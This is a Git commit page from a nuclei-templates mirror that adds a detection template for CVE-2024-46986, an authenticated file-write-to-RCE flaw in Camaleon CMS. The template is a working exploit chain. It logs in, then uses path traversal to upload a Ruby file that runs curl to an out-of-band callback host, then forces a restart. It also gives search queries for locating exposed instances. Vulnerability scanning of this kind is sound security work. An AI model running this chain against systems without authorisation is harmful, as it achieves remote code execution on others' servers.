daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #10843 from projectdiscovery/CVE-2024-46986 

Create CVE-2024-46986.yaml
patch-12
Ritik Chaddha 2024-09-30 12:05:42 +04:00 committed by GitHub
parent fa341d56e4 702a728d89
commit 757058f83e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 128 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

128
http/cves/2024/CVE-2024-46986.yaml Normal file
View File

@ -0,0 +1,128 @@
id: CVE-2024-46986
info:
name: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application
reference:
- https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
- https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2024-46986
cwe-id: CWE-22,CWE-74
epss-score: 0.0009
epss-percentile: 0.39015
cpe: cpe:2.3:a:tuzitio:camaleon_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 4
verified: true
vendor: tuzitio
product: camaleon_cms
shodan-query: title:"Camaleon CMS"
fofa-query: title="Camaleon CMS"
tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
filename: "{{to_lower(rand_text_alpha(12))}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /admin/login HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- 'name="authenticity_token" value="(.*?)"'
- raw:
- |
POST /admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
authenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}
matchers:
- type: dsl
dsl:
- 'contains(location,"/admin/dashboard")'
internal: true
- raw:
- |
POST /admin/media/upload?actions=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.rb"
Content-Type: text/x-ruby-script
`curl {{interactsh-url}}`
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="folder"
../../../config/initializers/
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="skip_auto_crop"
true
------WebKitFormBoundarynJs8ffRP2MgQXiF8--
matchers:
- type: word
part: body
words:
- '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
internal: true
- raw:
- |
POST /admin/media/upload?actions=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="file_upload"; filename="restart.txt"
Content-Type: text/x-ruby-script
{{randstr}}
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="folder"
../../../tmp/
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="skip_auto_crop"
true
------WebKitFormBoundarynJs8ffRP2MgQXiF8--
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- type: word
part: body
words:
- '{"name":"restart.txt","folder_path":"../../../tmp"'